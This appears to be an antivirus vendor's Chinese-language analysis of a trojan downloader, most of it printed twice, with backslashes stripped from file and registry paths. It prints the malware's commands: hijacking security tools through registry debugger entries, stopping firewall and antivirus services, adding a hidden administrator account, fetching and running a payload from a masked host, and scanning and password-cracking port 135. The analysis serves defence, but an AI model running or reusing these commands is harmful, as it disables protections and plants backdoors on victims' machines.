金山毒霸2009
金山清理专家
专杀工具
在线杀毒
密保
网盾
系统急救箱
ARP防火墙
本病毒所有命名:
影响系统:
Win9x,WinMe,Linux
简介:
1.释放病毒文件 C:Por.aed C:Documents and SettingsfishLocal SettingsTemporary Internet FilesContent.IE52PF3QNZECA05MZGT.htm
行为分析:
这是一个木马下载器病毒。病毒为了隐藏自己,所取的病毒名描述信息都比较象系统正常信息。它除了会下载大量其它病毒外,还会严重破坏系统,关闭部分安全软件,映像劫持大量软件,并试图建立后门。
:
影响系统:
Win9x,WinMe,Linux
简介:
1.释放病毒文件 C:Por.aed C:Documents and SettingsfishLocal SettingsTemporary Internet FilesContent.IE52PF3QNZECA05MZGT.htm
行为分析:
这是一个木马下载器病毒。病毒为了隐藏自己,所取的病毒名描述信息都比较象系统正常信息。它除了会下载大量其它病毒外,还会严重破坏系统,关闭部分安全软件,映像劫持大量软件,并试图建立后门。
描述:
1.释放病毒文件
C:Por.aed
C:Documents and SettingsfishLocal SettingsTemporary Internet FilesContent.IE52PF3QNZECA05MZGT.htm
C:Documents and SettingsfishLocal SettingsTemporary Internet FilesContent.IE5C4DGV5NIgx[1].jpg
C:Documents and SettingsfishLocal SettingsTemporary Internet FilesContent.IE5R146ZVU7
otepde[1].jpg
C:Program Files360safesafemonsafemes.dll
C:WINDOWSSoundMan.exe
C:WINDOWSsystem32interne.exe
C:WINDOWSsystem32Man.exe
C:WINDOWSsystem32
o1.ini
C:WINDOWSsystem32
ote2.ini
C:WINDOWSsystem32
otepde.exe
C:WINDOWSsystem32qoq.exe
C:WINDOWSsystem32 tjj5.ini
2.创建服务并开启来加载文件,使其随系统启动
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunSoundMan SoundMan.exe
映像劫持大量程序,添加360Loader.exe 360Safe.exe 360tray.exe IceSword Iparmor.exe kmailmon.exe ras runiep
镜象劫持为"Debugger"="svchost.exe" 添加ctfmon.exe为"Debugger"="SoundMan.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360Loader.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360Loader.exe Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360Safe.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360Safe.exe Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360tray.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360tray.exe Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsctfmon.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsctfmon.exe Debugger "SoundMan.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsIceSword
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsIceSword Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsIparmor.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsIparmor.exe Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionskmailmon.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionskmailmon.exe Debugger "svchost.exe"
.
.
.
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
as
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
as Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
uniep
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
uniep Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options askmgr.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options askmgr.exe Debugger "svchost.exe"
修改HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion ExplorerAdvancedFolderHiddenSHOWALL不显示隐藏文件
删除安全软件的启动项
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
kav KavPFW vptray runeip RavTask RfwMain 360Loader.exe ras 360Safe.exe 360Safetray
3.病毒生成文件中的网址由解密字符串得到
CA05MZGT.htm
gx[1].jpg
notepde[1].jpg
4.枚举进程 判断当前进程里是否有"fint2005.exe" "ehsniffer.exe" "iris.exe" 嗅探工具,不管有无都等待10分钟,连接网络
InternetOpenUrlA读取InternetReadFile http://xxxxxxxx.com/rc/1500/gx[1].txt里面的列表,下载http://xxxxxx.com/rc/1500/gx[1].jpg
到c:\windowssystem32vbb.exe运行
"cacls.exe C:WINDOWSsystem32cmd.exe /e /t /g everyone:F"给everyone用户组(就是所有人)对cmd.exe的完全控制,
cmd.exe /c net stop wscsvc&net stop sharedaccess&sc config sharedaccess start= disabled&sc config wscsvc
start= disabled&net stop KPfwSvc&net stop KWatchsvc&net stop McShield&net stop "Norton AntiVirus Server"
停止安全软件的服务。
5.搜索进程中是否含有kmailmon.exe kavstart.exe shstat.exe runiep.exe ras.exe MPG4C32.exe imsins.exe Iparmor.exe
360safe.exe 360tray.exe cacls.exe ccenter.exe 用TerminateProcess来结束
6."cmd.exe /c net user new1 12369 /add&
net user new1 12369&
net user new1 /active:yes&
net localgroup administrators /add
添加一个new1管理员帐号密码12369,将这些信息写入%windir%1.inf,然后调用rundll32.exe来修改Help and Support服务
C:WINDOWSsystem32interne.exe,并删除1.inf.关闭临时登陆用户new1
"HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList
ew1"添加建值为0,(1为开启)
不能创建删除用户"cmd.exe /c net user new1 /del"
7.访问"http://webipcha.cn/ip/ip.asp"获取当前外网IP,"cmd /c route print|find "Default Gateway: ">c:ip.txt"
获取网关地址到c:ip.txt,然后从文件重读出网关地址,删除文件。
8.判断当前进程有没有avp.exe 有了修改日期2001年7月15日
9.释放扫描器qoq.exe(Dotpot PortReady Ver1.6) 到%windir%/system32/下,扫描网关上下C段的所有135端口开放的主机,
记录到Por.aed,扫描外网C段上4个段位的ip ,"cmd.exe /c move "c:Por.aed" "%SystemRoot%system32Por.aed"&exit"
10.释放popo.exe到病毒运行当前目录读取Por.aed扫描出来的开135的IP地址 "cmd.exe /c start C:\popo.exe ip &exit"
(如cmd.exe /c start C:\popo.exe 192.1**.18.15 &exit 通过POPO.EXE进行扫字典密码破解)
11.扫描完毕删除qoq.exe, Por.aed, popo.exe
1.释放病毒文件
C:Por.aed
C:Documents and SettingsfishLocal SettingsTemporary Internet FilesContent.IE52PF3QNZECA05MZGT.htm
C:Documents and SettingsfishLocal SettingsTemporary Internet FilesContent.IE5C4DGV5NIgx[1].jpg
C:Documents and SettingsfishLocal SettingsTemporary Internet FilesContent.IE5R146ZVU7
otepde[1].jpg
C:Program Files360safesafemonsafemes.dll
C:WINDOWSSoundMan.exe
C:WINDOWSsystem32interne.exe
C:WINDOWSsystem32Man.exe
C:WINDOWSsystem32
o1.ini
C:WINDOWSsystem32
ote2.ini
C:WINDOWSsystem32
otepde.exe
C:WINDOWSsystem32qoq.exe
C:WINDOWSsystem32 tjj5.ini
2.创建服务并开启来加载文件,使其随系统启动
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunSoundMan SoundMan.exe
映像劫持大量程序,添加360Loader.exe 360Safe.exe 360tray.exe IceSword Iparmor.exe kmailmon.exe ras runiep
镜象劫持为"Debugger"="svchost.exe" 添加ctfmon.exe为"Debugger"="SoundMan.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360Loader.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360Loader.exe Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360Safe.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360Safe.exe Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360tray.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options360tray.exe Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsctfmon.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsctfmon.exe Debugger "SoundMan.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsIceSword
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsIceSword Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsIparmor.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsIparmor.exe Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionskmailmon.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionskmailmon.exe Debugger "svchost.exe"
.
.
.
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
as
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
as Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
uniep
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
uniep Debugger "svchost.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options askmgr.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options askmgr.exe Debugger "svchost.exe"
修改HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion ExplorerAdvancedFolderHiddenSHOWALL不显示隐藏文件
删除安全软件的启动项
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
kav KavPFW vptray runeip RavTask RfwMain 360Loader.exe ras 360Safe.exe 360Safetray
3.病毒生成文件中的网址由解密字符串得到
CA05MZGT.htm
gx[1].jpg
notepde[1].jpg
4.枚举进程 判断当前进程里是否有"fint2005.exe" "ehsniffer.exe" "iris.exe" 嗅探工具,不管有无都等待10分钟,连接网络
InternetOpenUrlA读取InternetReadFile http://xxxxxxxx.com/rc/1500/gx[1].txt里面的列表,下载http://xxxxxx.com/rc/1500/gx[1].jpg
到c:\windowssystem32vbb.exe运行
"cacls.exe C:WINDOWSsystem32cmd.exe /e /t /g everyone:F"给everyone用户组(就是所有人)对cmd.exe的完全控制,
cmd.exe /c net stop wscsvc&net stop sharedaccess&sc config sharedaccess start= disabled&sc config wscsvc
start= disabled&net stop KPfwSvc&net stop KWatchsvc&net stop McShield&net stop "Norton AntiVirus Server"
停止安全软件的服务。
5.搜索进程中是否含有kmailmon.exe kavstart.exe shstat.exe runiep.exe ras.exe MPG4C32.exe imsins.exe Iparmor.exe
360safe.exe 360tray.exe cacls.exe ccenter.exe 用TerminateProcess来结束
6."cmd.exe /c net user new1 12369 /add&
net user new1 12369&
net user new1 /active:yes&
net localgroup administrators /add
添加一个new1管理员帐号密码12369,将这些信息写入%windir%1.inf,然后调用rundll32.exe来修改Help and Support服务
C:WINDOWSsystem32interne.exe,并删除1.inf.关闭临时登陆用户new1
"HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList
ew1"添加建值为0,(1为开启)
不能创建删除用户"cmd.exe /c net user new1 /del"
7.访问"http://webipcha.cn/ip/ip.asp"获取当前外网IP,"cmd /c route print|find "Default Gateway: ">c:ip.txt"
获取网关地址到c:ip.txt,然后从文件重读出网关地址,删除文件。
8.判断当前进程有没有avp.exe 有了修改日期2001年7月15日
9.释放扫描器qoq.exe(Dotpot PortReady Ver1.6) 到%windir%/system32/下,扫描网关上下C段的所有135端口开放的主机,
记录到Por.aed,扫描外网C段上4个段位的ip ,"cmd.exe /c move "c:Por.aed" "%SystemRoot%system32Por.aed"&exit"
10.释放popo.exe到病毒运行当前目录读取Por.aed扫描出来的开135的IP地址 "cmd.exe /c start C:\popo.exe ip &exit"
(如cmd.exe /c start C:\popo.exe 192.1**.18.15 &exit 通过POPO.EXE进行扫字典密码破解)
11.扫描完毕删除qoq.exe, Por.aed, popo.exe
回复
评论病毒
